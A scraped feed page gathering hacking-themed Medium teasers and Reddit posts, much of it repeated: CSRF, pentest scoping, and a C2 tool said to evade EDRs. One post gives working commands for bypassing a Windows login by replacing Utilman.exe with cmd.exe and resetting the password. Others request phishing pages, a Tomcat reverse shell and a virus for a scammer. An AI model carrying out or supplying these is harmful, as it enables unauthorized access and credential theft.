The dangers of CSRF and GET requests
https://medium.com/@nostalgiaufc/the-dangers-of-csrf-and-get-requests-6455537bf438?source=rss------bug_bounty-5
For those of you who are unfamiliar with CSRF, it works as follows:Continue reading on Medium » (https://medium.com/@nostalgiaufc/the-dangers-of-csrf-and-get-requests-6455537bf438?source=rss------bug_bounty-5)
https://medium.com/@nostalgiaufc/the-dangers-of-csrf-and-get-requests-6455537bf438?source=rss------bug_bounty-5
For those of you who are unfamiliar with CSRF, it works as follows:Continue reading on Medium » (https://medium.com/@nostalgiaufc/the-dangers-of-csrf-and-get-requests-6455537bf438?source=rss------bug_bounty-5)
The dangers of CSRF and GET requests
For those of you who are unfamiliar with CSRF, it works as follows:Continue reading on Medium »
Read more...
For those of you who are unfamiliar with CSRF, it works as follows:Continue reading on Medium »
Read more...
How long does a Blackbox pentesting session take?
https://www.reddit.com/r/Pentesting/comments/v0eu9a/how_long_does_a_blackbox_pentesting_session_take/
<!-- SC_OFF -->As in the title, consider this question as a sort of survey... I know that there is no specific answer and the time needed can greatly vary! Thank you for your answers! <!-- SC_ON --> submitted by /u/LordGolia (https://www.reddit.com/user/LordGolia)
[link] (https://www.reddit.com/r/Pentesting/comments/v0eu9a/how_long_does_a_blackbox_pentesting_session_take/) [comments] (https://www.reddit.com/r/Pentesting/comments/v0eu9a/how_long_does_a_blackbox_pentesting_session_take/)
https://www.reddit.com/r/Pentesting/comments/v0eu9a/how_long_does_a_blackbox_pentesting_session_take/
<!-- SC_OFF -->As in the title, consider this question as a sort of survey... I know that there is no specific answer and the time needed can greatly vary! Thank you for your answers! <!-- SC_ON --> submitted by /u/LordGolia (https://www.reddit.com/user/LordGolia)
[link] (https://www.reddit.com/r/Pentesting/comments/v0eu9a/how_long_does_a_blackbox_pentesting_session_take/) [comments] (https://www.reddit.com/r/Pentesting/comments/v0eu9a/how_long_does_a_blackbox_pentesting_session_take/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
DOMAIN ADMIN Compromise in 3 HOURS
https://cdn-images-1.medium.com/max/2394/1*I_AAihoNqZvIyFpyKILiMg.png
Hi everyone; I hope you enjoyed my previous blog post on “How I obtained Admin access in 30 minutes” — so today I am bringing you another…
Continue reading on Medium »
DOMAIN ADMIN Compromise in 3 HOURS
https://cdn-images-1.medium.com/max/2394/1*I_AAihoNqZvIyFpyKILiMg.png
Hi everyone; I hope you enjoyed my previous blog post on “How I obtained Admin access in 30 minutes” — so today I am bringing you another…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The dangers of CSRF and GET requests
For those of you who are unfamiliar with CSRF, it works as follows:
Continue reading on Medium »
The dangers of CSRF and GET requests
For those of you who are unfamiliar with CSRF, it works as follows:
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Как Forta могла предотвратить взлом на 600 миллионов долларов
https://cdn-images-1.medium.com/max/2022/1*oec6CGPN0iQnrPlv7Yu0Pg.png
В этой статье я расскажу о том, как Forta могла предотвратить взлом протокола Poly Network стоимостью 600 миллионов долларов. Перевёл и…
Continue reading on Medium »
Как Forta могла предотвратить взлом на 600 миллионов долларов
https://cdn-images-1.medium.com/max/2022/1*oec6CGPN0iQnrPlv7Yu0Pg.png
В этой статье я расскажу о том, как Forta могла предотвратить взлом протокола Poly Network стоимостью 600 миллионов долларов. Перевёл и…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
RedGuard C2 Control Tool
https://cdn-images-1.medium.com/max/1179/1*4JYPB-ud2t7mG7LnQpUBOA.png
RedGuard is a C2 front flow control tool,Can avoid Blue Teams,AVs,EDRs check.
Continue reading on Medium »
RedGuard C2 Control Tool
https://cdn-images-1.medium.com/max/1179/1*4JYPB-ud2t7mG7LnQpUBOA.png
RedGuard is a C2 front flow control tool,Can avoid Blue Teams,AVs,EDRs check.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What do Ethical hackers do?
https://cdn-images-1.medium.com/max/2600/1*gNkD3tc-206IoEWS0GHNGg.jpeg
Is denial of provider, intrusion detection, and hacking net servers your ideas for amusing? If yes, then taking a career as an Information…
Continue reading on Medium »
What do Ethical hackers do?
https://cdn-images-1.medium.com/max/2600/1*gNkD3tc-206IoEWS0GHNGg.jpeg
Is denial of provider, intrusion detection, and hacking net servers your ideas for amusing? If yes, then taking a career as an Information…
Continue reading on Medium »
Hey Hello, Security guys & Hacker Thank you for your support.Continue reading on Medium » (https://akash0x0.medium.com/p3-bug-in-just-2-minute-fc6bf1710757?source=rss------bug_bounty-5)
hacking: security in practice
External infrastructure pen test query
Hey everyone, I have a question regarding external infrastructure/network pen testing, or more accurately, I'd like to understand the definition of an external infrastructure/network pen test of a company.
Let's say there's a company who require an external infrastructure pen test, they have multiple branches each with computers, printers, various servers for file sharing, a web server etc. My understanding would be the scoped area would be all externally facing IP addresses of those servers, printers, networks etc. So if for example they have a server with files which was accessible externally, you'd scan the IP of that server and look into what software is installed, how it's configured and find potential ways into that server. Is that right?
My confusion lies with cloud based services. Let's say that same company no longer has a physical onsite server for their file sharing, but instead uses Amazon buckets for all their files, would this also be included in an external infrastructure pen test or would it fall under another category such as 'cloud pen testing?
Thank you
submitted by /u/Tall_Bandicoot_7989
[link] [comments]
External infrastructure pen test query
Hey everyone, I have a question regarding external infrastructure/network pen testing, or more accurately, I'd like to understand the definition of an external infrastructure/network pen test of a company.
Let's say there's a company who require an external infrastructure pen test, they have multiple branches each with computers, printers, various servers for file sharing, a web server etc. My understanding would be the scoped area would be all externally facing IP addresses of those servers, printers, networks etc. So if for example they have a server with files which was accessible externally, you'd scan the IP of that server and look into what software is installed, how it's configured and find potential ways into that server. Is that right?
My confusion lies with cloud based services. Let's say that same company no longer has a physical onsite server for their file sharing, but instead uses Amazon buckets for all their files, would this also be included in an external infrastructure pen test or would it fall under another category such as 'cloud pen testing?
Thank you
submitted by /u/Tall_Bandicoot_7989
[link] [comments]
reddit
External infrastructure pen test query
Hey everyone, I have a question regarding external infrastructure/network pen testing, or more accurately, I'd like to understand the definition...
hacking: security in practice
Phishing pages
Are there any readymade webpage files of sites such as facebook, gmail, tiktok etc for phishing?
submitted by /u/random-nepali
[link] [comments]
Phishing pages
Are there any readymade webpage files of sites such as facebook, gmail, tiktok etc for phishing?
submitted by /u/random-nepali
[link] [comments]
reddit
Phishing pages
Are there any readymade webpage files of sites such as facebook, gmail, tiktok etc for phishing?
hacking: security in practice
Dealing with Apache Tomcat version 7.0.14
Hello guys. I came across in a situation where I am stucked at. So I am dealing with Apache Tomcat version 7.0.14 with JSP Coyote engine 1.1. The goal is to try to upload a file on the web server or run arbitrary code so I get reverse shell.. Ive looked into the vulnerabilities CVE's of this version.. but really couldnt help me much for that matter. The machine is Linux and there is no manager/html on the webserver, or atleast they dont use the default URL or is removed at all. I mean I dont see where I can try any credentials.
submitted by /u/mirahacker
[link] [comments]
Dealing with Apache Tomcat version 7.0.14
Hello guys. I came across in a situation where I am stucked at. So I am dealing with Apache Tomcat version 7.0.14 with JSP Coyote engine 1.1. The goal is to try to upload a file on the web server or run arbitrary code so I get reverse shell.. Ive looked into the vulnerabilities CVE's of this version.. but really couldnt help me much for that matter. The machine is Linux and there is no manager/html on the webserver, or atleast they dont use the default URL or is removed at all. I mean I dont see where I can try any credentials.
submitted by /u/mirahacker
[link] [comments]
reddit
Dealing with Apache Tomcat version 7.0.14
Hello guys. I came across in a situation where I am stucked at. So I am dealing with Apache Tomcat version 7.0.14 with JSP Coyote engine 1.1. The...
hacking: security in practice
Tutorial For Bypassing Windows Login Passwords.
You Will Need A USB Drive With A Linux ISO Image Flashed Into It.(I Recomend grml64-small)
Boot Into Your Flash Drive And Type These Commands
fdisk -l
mount -t ntfs /dev/(windows drive) /mnt
cd /mnt/Windows/System32
cp cmd.exe Utilman.exe
reboot
Click On The Accesibility Button And Type This Command When The CMD Window Lauches
net user (User) *
submitted by /u/riggasTor
[link] [comments]
Tutorial For Bypassing Windows Login Passwords.
You Will Need A USB Drive With A Linux ISO Image Flashed Into It.(I Recomend grml64-small)
Boot Into Your Flash Drive And Type These Commands
fdisk -l
mount -t ntfs /dev/(windows drive) /mnt
cd /mnt/Windows/System32
cp cmd.exe Utilman.exe
reboot
Click On The Accesibility Button And Type This Command When The CMD Window Lauches
net user (User) *
submitted by /u/riggasTor
[link] [comments]
reddit
Tutorial For Bypassing Windows Login Passwords.
A subreddit dedicated to hacking and hackers. Constructive collaboration and learning about exploits, industry standards, grey and white hat...
hacking: security in practice
Scam a scammer
Hello, i was chatting with an Instagram scammer that already has opened an grabify Link and i think he also would open other links so does anybody maybe knows good sites/programs to maybe make a kind of virus to scam the scammer ?
submitted by /u/Duduxy187
[link] [comments]
Scam a scammer
Hello, i was chatting with an Instagram scammer that already has opened an grabify Link and i think he also would open other links so does anybody maybe knows good sites/programs to maybe make a kind of virus to scam the scammer ?
submitted by /u/Duduxy187
[link] [comments]
reddit
Scam a scammer
Hello, i was chatting with an Instagram scammer that already has opened an grabify Link and i think he also would open other links so does anybody...